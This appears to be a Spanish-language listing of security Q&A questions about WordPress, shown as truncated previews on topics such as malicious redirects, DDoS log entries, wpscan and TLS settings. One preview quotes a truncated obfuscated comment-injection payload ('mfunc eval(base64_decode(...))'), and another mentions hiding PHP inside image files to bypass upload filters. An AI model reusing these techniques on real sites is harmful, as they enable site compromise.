Preguntas con etiqueta 'wordpress'

preguntas con etiqueta
1
respuesta

¿Este campo de entrada y esta función son seguros? [cerrado]

Simplemente estoy aprendiendo sobre la seguridad de TI, por lo que esto es algo básico y quizás lo estoy pensando demasiado. 1. Tengo este campo de entrada en mi sitio de wordpress (ssl está activado) que dirige al usuario al producto que...
hecha 19.08.2017 - 00:50
1
respuesta

¿Es posible o común que un sitio web (sin anuncios) haga solo un redireccionamiento malicioso?

Usando Chrome, fui a un sitio web de una empresa que estábamos investigando, siguiendo un enlace de una búsqueda de Google, y fui redirigido a un sitio web malicioso. Después de matar a Chrome y escanear en busca de virus, decidí investigar. En...
hecha 05.05.2017 - 19:57
1
respuesta

El correo electrónico está marcado como spam por Google [cerrado]

Está bien, esto es extraño, estaba trabajando con la función WP_Mail() , se ha llamado correctamente desde la siguiente declaración y el correo electrónico se entregó correctamente. if ($temp == 'offline-payment') { $return = $this-&...
hecha 23.12.2016 - 16:26
2
respuestas

Wordpress - 3.9 - subiendo un archivo php a través de la galería de medios

Estoy usando Wordpress 3.9.2. Como todos sabemos, la carga de medios de Wordpress tiene algunas restricciones: no puede cargar un archivo PHP, ya que puede ser malware. Hay una aplicación llamada: iCon2PHP que puede combinar php con jpg / png...
hecha 14.11.2015 - 00:26
1
respuesta

Hubo un archivo potencialmente dañino en mi servidor. ¿Qué daño ha causado? [cerrado]

Recibí una queja de abuso para mi servidor del proveedor de alojamiento. Después de una búsqueda exhaustiva, encontré el archivo con el nombre "title.php" en el directorio de carga de una instalación de WordPress. Tengo curiosidad por saber q...
hecha 09.07.2015 - 15:03
1
respuesta

¿Tiene sentido escanear el sitio localhost?

Hace poco estaba jugando con wpscan. Me preguntaba si tiene sentido escanear un sitio en su servidor localhost. Creo que es así porque hay ejemplos como DVWA, pero me imagino que lo hace y no para otros casos. ¿Tendría sentido hacer esto? Si...
hecha 27.05.2015 - 21:21
1
respuesta

Nuevo ataque de DDos en el sitio web de WordPress

Recientemente vi algo nuevo (al menos para mí) en el archivo de registro [% tools.ua.random ()%] como se muestra a continuación: 199.246.2.10 - - [21/Aug/2014:13:25:15 +0545] "POST /wp-login.php HTTP/1.1" 200 2809 "http://mywebsite.com/wp-logi...
hecha 21.08.2014 - 11:18
2
respuestas

¿Cómo bloquear a los usuarios para que no descarguen un archivo adjunto de una publicación de WordPress cronometrada antes de que se publique el artículo?

¿Estoy intentando resolver cómo bloquear a los usuarios para que no descarguen un archivo adjunto de una publicación de WordPress cronometrada antes de que el artículo se publique? Los archivos adjuntos funcionan como cargas en un campo personal...
hecha 02.09.2014 - 13:28
1
respuesta

WordPress Comment Hacking Attempt

Recientemente, Akismet me pidió que moderara un posible comentario de spam en mi blog. Era: <!--mfunc eval(base64_decode("ICRmaWxlID0gZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pIC4gJy8nIC4gJ3dwLWluY2x1ZGVzL3lkZXNrLnBocCc7ICRzcmMgPSA...
hecha 13.10.2013 - 14:09
1
respuesta

Deshabilitar TLS 1.0 / en Wordpress

Ejecuto un sitio web de Wordpress en un plan OVH, por lo que no tengo control directo sobre el servidor. Quiero deshabilitar TLS V1.0 ya que tiene vulnerabilidades de seguridad conocidas. La mayoría de las guías que he encontrado en esto han...
hecha 24.07.2018 - 23:24